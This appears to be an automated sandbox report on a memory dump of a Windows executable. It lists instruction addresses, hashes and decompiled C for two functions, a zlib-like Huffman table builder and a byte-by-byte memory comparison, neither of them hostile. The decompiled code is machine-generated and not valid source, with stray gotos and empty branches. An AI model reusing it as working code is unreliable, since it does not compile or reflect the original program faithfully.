0x00408588
0x0040858b
0x00408593
0x00408594
0x00408595
0x00408596
0x00408598
0x00408599
0x00408599
0x00000000
0x00000000
0x004085a0
0x004085a0
0x004085a3
0x004085a6
0x004085a9
0x004085ac
0x004085af
0x00000000
0x00000000
0x00408431
0x00408431
0x00408434
0x00408437
0x0040843a
0x0040843d
0x00408442
0x00408446
0x00408446
0x00408446
0x00408449
0x0040844b
0x0040844f
0x00408453
0x00408456
0x0040845e
0x0040845f
0x00408460
0x00408461
0x00408463
0x00408464
0x00000000
0x00000000
0x00407d06
0x00407d06
0x00407d0b
0x00407d0e
0x00407d11
0x00407d13
0x00407d15
0x00407d1b
0x00000000
0x00000000
0x00407d23
0x00407d32
0x00407d3a
0x00407d3d
0x00407d3f
0x0040836a
0x00407c6c
0x00407c72
0x00407c75
0x00407c78
0x00000000
0x00407d45
0x00407d45
0x00407d49
0x00407d4c
0x00408335
0x00408335
0x00000000
0x00408335
0x00000000
0x00000000
0x00407d57
0x00407d57
0x00407d5a
0x00407d5d
0x00407d60
0x00000000
0x00000000
0x00408371
0x00408374
0x00408377
0x0040837d
0x00408384
0x00408387
0x0040838d
0x00408390
0x00408393
0x00407c7b
0x00407c7b
0x00407c80
0x00407c82
0x00407c84
0x00407c87
0x00407c8a
0x00407c8b
0x00407c8c
0x00407c9d
0x00000000
0x00000000
0x00408338
0x00408338
0x0040833a
0x00407c6a
0x00000000

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36907fc8306176e638f353bdf2f98e8eed9bff087d4bb27238f9590338352019
Instruction ID: d52ff8933143ab3a871bade64dde974bd9118df7c83b003ddc85298011d30fc0
Opcode Fuzzy Hash: 36907fc8306176e638f353bdf2f98e8eed9bff087d4bb27238f9590338352019
Instruction Fuzzy Hash: E6027EB1A006059FDB18CF25C9906AAB7F2FF84304F14C56ED89A9B785E779EA40CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004051A0 Relevance: .4, Instructions: 369
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E004051A0(signed int* _a4, signed int _a8, signed char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int* _a28, intOrPtr _a32, signed int* _a36, signed int* _a40) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				unsigned int _v36;
				unsigned int _v40;
				unsigned int _v44;
				unsigned int _v48;
				unsigned int _v52;
				unsigned int _v56;
				unsigned int _v60;
				unsigned int _v64;
				unsigned int _v68;
				unsigned int _v72;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int* _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				char _v187;
				signed char _v188;
				signed int _v192;
				signed int* _v196;
				signed int* _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				signed int _v212;
				signed int* _v216;
				signed int* _v220;
				signed int _v280;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t207;
				signed int _t211;
				signed int _t216;
				signed int* _t217;
				signed int** _t219;
				signed int* _t220;
				void* _t223;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int* _t235;
				signed int _t237;
				signed int _t240;
				void* _t241;
				void* _t242;
				signed int* _t245;
				signed int _t248;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				intOrPtr _t260;
				signed int _t261;
				signed int _t265;
				intOrPtr _t270;
				signed char _t280;
				intOrPtr _t284;
				signed char* _t287;
				signed int* _t291;
				signed int _t292;
				signed char _t297;
				signed int _t315;
				intOrPtr* _t320;
				signed int _t322;
				signed int _t323;
				intOrPtr _t324;
				signed int* _t328;
				void* _t331;
				signed int _t332;
				void* _t334;
				signed int* _t335;
				unsigned int _t336;
				signed int _t340;
				signed int _t342;

				_t207 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t207 ^ _t342;
				_t291 = _a4;
				_t245 = _a28;
				_v204 = _a32;
				_t332 = _a8;
				_t320 = _a24;
				_v196 = _a40;
				_t211 = 0;
				_v156 = _t291;
				_v180 = _t332;
				_v216 = _t320;
				_v200 = _a36;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				do {
					 *((intOrPtr*)(_t342 +  *_t291 * 4 - 0x44)) =  *((intOrPtr*)(_t342 +  *_t291 * 4 - 0x44)) + 1;
					_t291 =  &(_t291[1]);
					_t332 = _t332 - 1;
				} while (_t332 != 0);
				if(_v72 != _v180) {
					_t292 =  *_t245;
					_v140 = _t292;
					_t254 = 1;
					while( *((intOrPtr*)(_t342 + _t254 * 4 - 0x44)) == _t211) {
						_t254 = _t254 + 1;
						if(_t254 <= 0xf) {
							continue;
						}
						break;
					}
					_v144 = _t254;
					if(_t292 < _t254) {
						_v140 = _t254;
						_t292 = _t254;
					}
					_t333 = 0xf;
					while( *((intOrPtr*)(_t342 + _t333 * 4 - 0x44)) == _t211) {
						_t333 = _t333 - 1;
						if(_t333 != 0) {
							continue;
						}
						break;
					}
					_v168 = _t333;
					if(_t292 > _t333) {
						_v140 = _t333;
						_t292 = _t333;
					}
					_t322 = 1 << _t254;
					 *_t245 = _t292;
					if(_t254 >= _t333) {
						L18:
						_t255 = _t333 * 4;
						_t245 = _t342 + _t255 - 0x44;
						_v164 = _t255;
						_t256 =  *_t245;
						_t323 = _t322 - _t256;
						_v212 = _t323;
						if(_t323 < 0) {
							goto L28;
						} else {
							 *_t245 = _t256 + _t323;
							_t260 = 0;
							_t334 = _t333 - 1;
							_v132 = _t211;
							if(_t334 != 0) {
								_t331 = 0;
								do {
									_t260 = _t260 +  *((intOrPtr*)(_t342 + _t331 - 0x40));
									_t331 = _t331 + 4;
									_t334 = _t334 - 1;
									 *((intOrPtr*)(_t342 + _t331 - 0x80)) = _t260;
								} while (_t334 != 0);
							}
							_t335 = _v156;
							_t324 = 0;
							do {
								_t261 =  *_t335;
								_t335 =  &(_t335[1]);
								_v148 = _t335;
								if(_t261 != _t211) {
									_t340 =  *(_t342 + _t261 * 4 - 0x84);
									 *((intOrPtr*)(_v196 + _t340 * 4)) = _t324;
									 *(_t342 + _t261 * 4 - 0x84) = _t340 + 1;
									_t335 = _v148;
								}
								_t324 = _t324 + 1;
							} while (_t324 < _v180);
							_v180 =  *((intOrPtr*)(_t342 + _v164 - 0x84));
							_v148 = _v196;
							_t265 = _v144;
							_t323 = 0;
							_t248 =  ~_t292;
							_v176 = 0;
							_v136 = _t211;
							_v152 = 0xffffffff;
							_v280 = _t211;
							_v156 = _t211;
							_v164 = _t211;
							if(_t265 > _v168) {
								L68:
								if(_v212 != _t211 && _v168 != 1) {
									_t211 = 0xfffffffb;
								}
								return E0042A36A(_t211, _t248, _v8 ^ _t342, _t292, _t323, _t335);
							} else {
								_t333 = _v184;
								_v172 = _t342 + _t265 * 4 - 0x44;
								while(1) {
									_t270 =  *_v172;
									_v160 = _t270;
									if(_t270 == _t211) {
										goto L66;
									}
									do {
										_v160 = _v160 - 1;
										_t217 = _t248 + _t292;
										if(_v144 <= _t217) {
											L50:
											_v187 = _v144 - _t248;
											_t219 = _v148;
											if(_t219 < _v196 + _v180 * 4) {
												_t220 =  *_t219;
												_t297 = _a12;
												if(_t220 >= _t297) {
													_t223 = _t220 - _t297 + _t220 - _t297 + _t220 - _t297 + _t220 - _t297;
													_v188 =  *((intOrPtr*)(_t223 + _a20)) + 0x50;
													_t333 =  *(_t223 + _a16);
												} else {
													asm("sbb dl, dl");
													_v188 = (_t297 & 0x000000a0) + 0x60;
													_t335 = _t220;
												}
												_v148 =  &(_v148[1]);
											} else {
												_v188 = 0xc0;
											}
											_t225 = _t323 >> _t248;
											if(_t225 < _v164) {
												_t287 = _v156 + _t225 * 8;
												do {
													 *_t287 = _v188;
													_t287[4] = _t335;
													_t225 = _t225 + 1;
													_t287 =  &(_t287[8]);
												} while (_t225 < _v164);
												_t323 = _v176;
											}
											_t227 = 1 << _v144 - 1;
											if((_t323 & 0x00000001) != 0) {
												do {
													_t323 = _t323 ^ _t227;
													_t227 = _t227 >> 1;
												} while ((_t323 & _t227) != 0);
											}
											_t323 = _t323 ^ _t227;
											_t228 = _v152;
											_v176 = _t323;
											if(((0x00000001 << _t248) - 0x00000001 & _t323) !=  *((intOrPtr*)(_t342 + _t228 * 4 - 0x84))) {
												do {
													_t248 = _t248 - _v140;
													_t228 = _t228 - 1;
												} while (((0x00000001 << _t248) - 0x00000001 & _t323) !=  *((intOrPtr*)(_t342 + _t228 * 4 - 0x84)));
												_v152 = _t228;
											}
											goto L65;
										} else {
											_v208 = _v160 + 1;
											_v192 = _t248 - _t292;
											while(1) {
												_v192 = _v192 + _t292;
												_v152 = _v152 + 1;
												_t245 = _t217;
												_t229 = _v140;
												_t315 = _v168 - _t245;
												if(_t315 > _t229) {
													_t315 = _t229;
												}
												_t280 = _v144 - _t245;
												_t231 = 1 << _t280;
												if(1 > _v208) {
												}
												L38:
												_t241 = _t231 + (_t323 | 0xffffffff) - _v160;
												_t323 = _v172;
												if(_t280 < _t315) {
													_t280 = _t280 + 1;
													if(_t280 < _t315) {
														while(1) {
															_t328 = _t323 + 4;
															_v156 = _t328;
															_t323 =  *_t328;
															_t242 = _t241 + _t241;
															if(_t242 <= _t323) {
																goto L44;
															}
															_t280 = _t280 + 1;
															_t241 = _t242 - _t323;
															if(_t280 < _t315) {
																_t323 = _v156;
																continue;
															}
															goto L44;
														}
													}
												}
												L44:
												_t233 =  *_v200;
												_v164 = 1;
												_t292 = (1 << _t280) + _t233;
												if(1 > 0x5a0) {
													goto L28;
												} else {
													_t323 = _v204 + _t233 * 8;
													_t235 = _t342 + _v152 * 4 - 0x114;
													_v220 = _t235;
													 *_t235 = _t323;
													 *_v200 = _t292;
													_t237 = _v152;
													_v156 = _t323;
													if(_t237 == 0) {
														 *_v216 = _t323;
													} else {
														_t336 = _v176;
														 *(_t342 + _t237 * 4 - 0x84) = _t336;
														_v188 = _t280;
														_t240 = _t336 >> _v192;
														_t284 =  *((intOrPtr*)(_v220 - 4));
														_v187 = _v140;
														_t333 = (_t323 - _t284 >> 3) - _t240;
														 *(_t284 + _t240 * 8) = _v188;
														 *(_t284 + 4 + _t240 * 8) = (_t323 - _t284 >> 3) - _t240;
													}
													_t217 = _t245 + _v140;
													if(_v144 > _t217) {
														_t292 = _v140;
														_v192 = _v192 + _t292;
														_v152 = _v152 + 1;
														_t245 = _t217;
														_t229 = _v140;
														_t315 = _v168 - _t245;
														if(_t315 > _t229) {
															_t315 = _t229;
														}
														_t280 = _v144 - _t245;
														_t231 = 1 << _t280;
														if(1 > _v208) {
														}
														goto L44;
													} else {
														_t323 = _v176;
														goto L50;
													}
												}
												goto L72;
											}
										}
										goto L72;
										L65:
										_t292 = _v140;
									} while (_v160 != 0);
									L66:
									_v172 = _v172 + 4;
									_t216 = _v144 + 1;
									_v144 = _t216;
									if(_t216 <= _v168) {
										_t211 = 0;
										continue;
									} else {
										_t211 = 0;
										goto L68;
									}
									goto L72;
								}
							}
						}
					} else {
						while(1) {
							_t323 = _t322 -  *((intOrPtr*)(_t342 + _t254 * 4 - 0x44));
							if(_t323 < 0) {
								break;
							}
							_t254 = _t254 + 1;
							_t322 = _t323 + _t323;
							if(_t254 < _t333) {
								continue;
							} else {
								goto L18;
							}
							goto L72;
						}
						L28:
						return E0042A36A(0xfffffffd, _t245, _v8 ^ _t342, _t292, _t323, _t333);
					}
				} else {
					 *_t320 = 0;
					 *_t245 = 0;
					return E0042A36A(0, _t245, _v8 ^ _t342, _t291, _t320, _t332);
				}
				L72:
			}

0x004051a9
0x004051b0
0x004051b6
0x004051bd
0x004051c0
0x004051ca
0x004051ce
0x004051d1
0x004051d7
0x004051d9
0x004051df
0x004051e5
0x004051eb
0x004051f1
0x004051f4
0x004051f7
0x004051fa
0x004051fd
0x00405200
0x00405203
0x00405206
0x00405209
0x0040520c
0x0040520f
0x00405212
0x00405215
0x00405218
0x0040521b
0x0040521e
0x00405221
0x00405223
0x0040522b
0x0040522e
0x0040522e
0x0040523a
0x00405253
0x00405255
0x0040525b
0x00405260
0x00405266
0x0040526a
0x00000000
0x00000000
0x00000000
0x0040526a
0x0040526c
0x00405274
0x00405276
0x0040527c
0x0040527c
0x0040527e
0x00405283
0x00405289
0x0040528a
0x00000000
0x00000000
0x00000000
0x0040528a
0x0040528c
0x00405294
0x00405296
0x0040529c
0x0040529c
0x004052a3
0x004052a5
0x004052a9
0x004052c1
0x004052c1
0x004052c8
0x004052cc
0x004052d2
0x004052d4
0x004052d6
0x004052dc
0x00000000
0x004052e2
0x004052e4
0x004052e6
0x004052e8
0x004052e9
0x004052ec
0x004052ee
0x004052f0
0x004052f0
0x004052f4
0x004052f7
0x004052f8
0x004052f8
0x004052f0
0x004052fe
0x00405304
0x00405310
0x00405310
0x00405312
0x00405315
0x0040531d
0x0040531f
0x00405333
0x00405337
0x00405339
0x00405339
0x0040533f
0x00405340
0x00405355
0x00405361
0x00405367
0x0040536f
0x00405371
0x00405373
0x00405379
0x0040537f
0x00405389
0x0040538f
0x00405395
0x004053a1
0x004056b8
0x004056be
0x004056c9
0x004056c9
0x004056de
0x004053a7
0x004053a7
0x004053b1
0x004053d2
0x004053d8
0x004053da
0x004053e2
0x00000000
0x00000000
0x004053f0
0x004053f0
0x004053f6
0x004053ff
0x00405564
0x00405574
0x00405583
0x0040558b
0x00405596
0x00405598
0x0040559d
0x004055bd
0x004055c5
0x004055ce
0x0040559f
0x004055a4
0x004055ac
0x004055b2
0x004055b2
0x004055d1
0x0040558d
0x0040558d
0x0040558d
0x004055e5
0x004055ed
0x004055f5
0x00405600
0x00405606
0x0040560f
0x00405612
0x00405614
0x00405616
0x0040561e
0x0040561e
0x00405630
0x00405634
0x00405636
0x00405636
0x00405638
0x0040563a
0x00405636
0x00405647
0x00405649
0x0040564f
0x0040565f
0x00405661
0x00405661
0x00405670
0x00405674
0x0040567d
0x0040567d
0x00000000
0x00405405
0x0040540e
0x00405414
0x00405426
0x00405426
0x00405432
0x00405438
0x0040543a
0x00405440
0x00405444
0x00405446
0x00405446
0x0040544e
0x00405455
0x0040545d
0x0040545d
0x0040545f
0x00405468
0x0040546a
0x00405472
0x00405474
0x00405477
0x00405486
0x00405486
0x00405489
0x0040548f
0x00405491
0x00405495
0x00000000
0x00000000
0x00405497
0x00405498
0x0040549c
0x00405480
0x00000000
0x00405480
0x00000000
0x0040549c
0x00405486
0x00405477
0x0040549e
0x004054a4
0x004054ad
0x004054b3
0x004054bb
0x00000000
0x004054c1
0x004054c7
0x004054d0
0x004054d7
0x004054dd
0x004054e5
0x004054e7
0x004054ed
0x004054f5
0x00405547
0x004054f7
0x004054f7
0x00405503
0x0040550a
0x00405518
0x00405520
0x00405527
0x00405536
0x00405538
0x0040553b
0x0040553b
0x0040554f
0x00405558
0x00405420
0x00405426
0x00405432
0x00405438
0x0040543a
0x00405440
0x00405444
0x00405446
0x00405446
0x0040544e
0x00405455
0x0040545d
0x0040545d
0x00000000
0x0040555e
0x0040555e
0x00000000
0x0040555e
0x00405558
0x00000000
0x004054bb
0x00405426
0x00000000
0x00405683
0x0040568a
0x0040568a
0x00405696
0x0040569c
0x004056a3
0x004056a4
0x004056b0
0x004053d0
0x00000000
0x004056b6
0x004056b6
0x00000000
0x004056b6
0x00000000
0x004056b0
0x004053d2
0x004053a1
0x004052ab
0x004052b0
0x004052b0
0x004052b4
0x00000000
0x00000000
0x004052ba
0x004052bb
0x004052bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004052bf
0x004053bb
0x004053ce
0x004053ce
0x0040523c
0x0040523c
0x0040523f
0x00405252
0x00405252
0x00000000

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 216fc6afe47c31696e362f2472497ecd3d0c501a1eaafaba253686008bbe95ea
Instruction ID: 373acb41c5fca92487e2eb85d432bd986ecd52c4efa3892e7e8e511021242dd2
Opcode Fuzzy Hash: 216fc6afe47c31696e362f2472497ecd3d0c501a1eaafaba253686008bbe95ea
Instruction Fuzzy Hash: AFF11631A006298FDB64CF28D88079EB7B2FB89314F5581EAC84DA7384DA346E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042B366 Relevance: .4, Instructions: 355
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042B366(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t209;
				signed char _t210;
				signed int _t215;
				signed int _t291;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t333;
				void* _t335;
				void* _t337;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t291 = 0;
					L17:
					if(_t291 != 0) {
						goto L1;
					}
					_t205 =  *(_t196 - 0x1b);
					if(_t205 ==  *(_t200 - 0x1b)) {
						_t291 = 0;
						L28:
						if(_t291 != 0) {
							goto L1;
						}
						_t206 =  *(_t196 - 0x17);
						if(_t206 ==  *(_t200 - 0x17)) {
							_t291 = 0;
							L39:
							if(_t291 != 0) {
								goto L1;
							}
							_t207 =  *(_t196 - 0x13);
							if(_t207 ==  *(_t200 - 0x13)) {
								_t291 = 0;
								L50:
								if(_t291 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t291 = 0;
									L61:
									if(_t291 != 0) {
										goto L1;
									}
									_t209 =  *(_t196 - 0xb);
									if(_t209 ==  *(_t200 - 0xb)) {
										_t291 = 0;
										L72:
										if(_t291 != 0) {
											goto L1;
										}
										_t210 =  *(_t196 - 7);
										if(_t210 ==  *(_t200 - 7)) {
											_t291 = 0;
											L83:
											if(_t291 != 0) {
												goto L1;
											}
											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t294 == 0) {
												L5:
												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t296 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
														_t197 = (_t197 > 0) + _t8;
													}
													L2:
													return _t197;
												}
												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												if(_t215 != 0) {
													L86:
													_t197 = _t215;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
											if(_t215 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t298 == 0) {
											L76:
											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t300 == 0) {
												L78:
												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t302 == 0) {
													L80:
													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t291 != 0) {
														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
														_t291 = (_t291 > 0) + _t189;
													}
													goto L83;
												}
												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
												_t291 = (_t302 > 0) + _t183;
												if(_t291 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
											_t291 = (_t300 > 0) + _t177;
											if(_t291 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
										_t291 = (_t298 > 0) + _t171;
										if(_t291 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t305 == 0) {
										L65:
										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t307 == 0) {
											L67:
											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t309 == 0) {
												L69:
												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t291 != 0) {
													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
													_t291 = (_t291 > 0) + _t164;
												}
												goto L72;
											}
											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
											_t291 = (_t309 > 0) + _t158;
											if(_t291 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
										_t291 = (_t307 > 0) + _t152;
										if(_t291 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
									_t291 = (_t305 > 0) + _t146;
									if(_t291 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L54:
									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L56:
										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L58:
											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t291 != 0) {
												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
												_t291 = (_t291 > 0) + _t139;
											}
											goto L61;
										}
										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
										_t291 = (_t316 > 0) + _t133;
										if(_t291 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
									_t291 = (_t314 > 0) + _t127;
									if(_t291 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
								_t291 = (_t312 > 0) + _t121;
								if(_t291 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L43:
								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L45:
									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L47:
										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t291 != 0) {
											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
											_t291 = (_t291 > 0) + _t113;
										}
										goto L50;
									}
									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
									_t291 = (_t323 > 0) + _t107;
									if(_t291 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
								_t291 = (_t321 > 0) + _t101;
								if(_t291 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
							_t291 = (_t319 > 0) + _t95;
							if(_t291 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t326 == 0) {
							L32:
							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t328 == 0) {
								L34:
								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t330 == 0) {
									L36:
									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t291 != 0) {
										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
										_t291 = (_t291 > 0) + _t88;
									}
									goto L39;
								}
								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
								_t291 = (_t330 > 0) + _t82;
								if(_t291 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
							_t291 = (_t328 > 0) + _t76;
							if(_t291 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
						_t291 = (_t326 > 0) + _t70;
						if(_t291 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t333 == 0) {
						L21:
						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t335 == 0) {
							L23:
							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t337 == 0) {
								L25:
								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t291 != 0) {
									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
									_t291 = (_t291 > 0) + _t63;
								}
								goto L28;
							}
							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
							_t291 = (_t337 > 0) + _t57;
							if(_t291 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
						_t291 = (_t335 > 0) + _t51;
						if(_t291 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
					_t291 = (_t333 > 0) + _t45;
					if(_t291 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t38 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t38;
								}
								goto L17;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t32 = __edx - 1; // -1
							__esi = __edx + _t32;
							if(__edx + _t32 != 0) {
								goto L1;
							}
							goto L14;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t26 = __edx - 1; // -1
						__esi = __edx + _t26;
						if(__edx + _t26 != 0) {
							goto L1;
						}
						goto L12;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t20 = __edx - 1; // -1
					__esi = __edx + _t20;
					if(__edx + _t20 != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t291;
				goto L2;
			}

0x0042b366
0x0042b366
0x0042b36c
0x0042b3e4
0x0042b3e6
0x0042b3e8
0x00000000
0x00000000
0x0042b3ee
0x0042b3f4
0x0042b46b
0x0042b46d
0x0042b46f
0x00000000
0x00000000
0x0042b475
0x0042b47b
0x0042b4f2
0x0042b4f4
0x0042b4f6
0x00000000
0x00000000
0x0042b4fc
0x0042b502
0x0042b579
0x0042b57b
0x0042b57d
0x00000000
0x00000000
0x0042b589
0x0042b601
0x0042b603
0x0042b605
0x00000000
0x00000000
0x0042b60b
0x0042b611
0x0042b688
0x0042b68a
0x0042b68c
0x00000000
0x00000000
0x0042b692
0x0042b698
0x0042b70f
0x0042b711
0x0042b713
0x00000000
0x00000000
0x0042b721
0x0042b723
0x0042b33e
0x0042b346
0x0042b348
0x0042af5e
0x0042af66
0x0042af68
0x0042af75
0x0042af75
0x0042af75
0x0042aba6
0x0042b84a
0x0042b84a
0x0042b355
0x0042b35b
0x0042b73c
0x0042b73c
